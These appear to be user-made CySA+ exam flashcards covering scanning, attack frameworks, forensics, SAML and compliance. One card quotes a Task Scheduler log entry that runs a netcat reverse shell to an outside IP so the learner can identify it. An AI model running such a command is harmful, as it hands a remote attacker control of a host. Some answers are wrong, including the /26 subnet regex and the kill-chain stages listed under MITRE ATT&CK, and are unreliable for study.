CySA+ Flashcards
Vulnerability scan output: CVE-2011-3389
QID 42366 -SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: OpenSSL s_client-connect login.diontraining.com:443 -tls -cipher “AES:CAMELISA:SEED:3DES:DES”
What category should this be classified as?
Web application cryptography vulnerability
Your an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?
Behavior based
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?
Change all devices and servers that support it to 636 because encrypted services run by default on 636
Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?
Alert volume: an increase may correlate with an increase of detected incidents
What tools can be used to conduct a banner grab from a web server on a remote host?
netcat, wget, and telnet
(ftp can’t do it)
A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?
-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is know to allow remote code execution
An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illistrate?
Command and Control (C2)
Which analysis framework provides a graphical depiction of the attackers approach relative to a kill chain?
Diamond Model of Intrusion Analysis
Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?
MITRE ATT&CK
According to the Center for Internet Securitiy’s system design recommendation, which control category would contain info on the best security practices to implement within SDLC?
Application Software Security
A cybersecurity analyst has received an alert that sensors continuously observe a well-know call home messages at their network boundary. Still, the orgs proxy firewall is properly configured to successfully drop the messages before leaving the network. What is the most likely cause of the message being sent?
An infected workstation is attempting to reach a C2 server
You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?
\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don’t have the raw socket privileges on you workstation. What command should you use to conduct the SYN scan from your workstation?
nmap -sT
Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?
MSSP: Managed Security Service Provider
A companies CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implimented?
Formal methods of verification
What provides a standard nomenclature for describing security-related software flaws?
CVE
You suspect a system’s firmware has been compromised. What type of firmware would provide resistance against suck attack?
Trusted Firmware
What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26
\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b
What is least likely to be included in a data retention policy?
Classification Info
As a forensic analyst, what should you collect first?
L3 Cach(CPU registry), RAM Cache(System Memory), SSD(Storage Devices), Backup drives
Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?
Legal and regulatory issues may prevent data migration to the cloud
Diamond Model of Intrusion Analysis
Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability
MITRE ATT&CK
Framework detailing tactic, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives
OWASP Testing Guide
Methodology for testing web application security
Cyber Kill Chain
Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat
What secure coding practice ensures a character like < is translated into the < string when written to an HTML page?
Output Encoding
You are a cyber analyst at a privatly owned bank. Which regulations would have the greatest impact on your bank’s cybersecurity program?
GLBA
Gramm-Leach-Bliley Act
Federal law explaining how to protect customer’s private info
Root Cause Analysis
Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents
Forensic Analysis
Through investigation thats focus in broader and often includes legal implications
What can prevent firmware downgrades?
eFuse
Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip
You see the following log entry. What is it and how to stop it?
sc config schedule start auto
net start schedule
at 10:42 ““c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe””
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12
You should recommend removing the host from the network
What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?
User and entity behavior analytics
tcpdump
Primarily used for capturing and analyzing network packets
Faster than Wireshark
No GUI
What sanitization technique removes data, overwriting a hard drive with randoms 1s and 0s?
Clear
Which part in a federation provides services to members of the federation?
RP: Relying Party
IdP
Identity Provider
Provides identities, makes assertions about those identities and releases info about identity holders
SAML
Security Assertion Markup Language
Open standard for exchanging authentication & authorization data between parties between an IdP
SSO
Single Sign On
Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation
What technique is most likely to identify a buffer overflow vulnerability in an app during development?
Static code analysis
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?
/etc/xinetd.conf
newer versions: sytemctl
According to MITRE ATT&CK framework what capability can identify and exploit a zero-day vulnerablity?
Developed
What type of solution would you classify an FPGA?
Anti-tamper
Field-Programmable Gate Array
WannaCry’s use of Eternal Blue represents which phase of the Cyber Kill Chain?
Weaponization
What is the most widely used web-application scanner?
ZAP
OWASP Zed Attack Proxy
What are 3 Infrastructure vulnerability scanners?
Qualys, OpenVAS, Nessus
What type of file is commonly used to store configuration settings for a macOS system?
plists
(property lists)
During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?
You scanned a CDN-hosted version of the site.
CDN: Content Delivery Network
Geographically distributed network of proxy servers
What is the proper order of the UEFI boot phases?
Security
Pre-EFI initialization
Driver Execution Environment
Boot Device Select
Transient System Load
Runtime
What proprietary tool is used to create forensic disk images without making changes to the original evidence?
FTK Imager
Memdump
Used to collect content within RAM on a given host
Autopsy
Open-source forensic tool suite
Which role validates the user’s identity when using SAML for authentication?
IdP
You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate proccess to ensure that data exposure doesn’t occur during this process?
Purge, validate, and document the sanitation of the drives
What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?
GPS location and NAC
What describes the infrastructure needed to support the other architectural domains in the TBGAF framework?
Technical architecture
Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?
Application Whitelisting
You conduct a vulnerability scan of a data center and notice that a managed interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor’s management interface be exposed to, to ensure the best security of the virtualization platform?
Management Network
You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?
Scan for malware
Physically inspect the laptop and compare it with images made before you left
You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?
Recycling Bin
Slack Space
What does the Infrastructure component of the Diamond Model refer to?
The physical or virtual resources used (phishing)
Persistance
MITRE ATT&CK framework
Stage that describes how the adversary maintains a foothold in the network
Command and Control
MITRE ATT&CK framework
Represents the communication channel
You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?
DNS Blackholing
Uses a list known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply
An org want to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?
Kerberos
An analyst suspect that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed?
which bash
SCAP
Security Content Automation Protocol
Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement
Security Onion
Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management
What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Infrastructure as Code (IaC)
A forensic analyst needs to access a macOS encrypted drive that uses File Vault2. What are 3 means of unlocking the volume?
Extract the keys from iCloud
Retrieve the key from memory while the volume is mounted
Obtain the recovery key
You’re a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?
Playbook
Runbook is an automated response
Input validation can prevent what vulnerabilities?
SQL Injection
Cross-Site Scripting
XML Injection
Directory Traversal
What is the lowest layer of bare-metal virtualization environment?
The physical hardware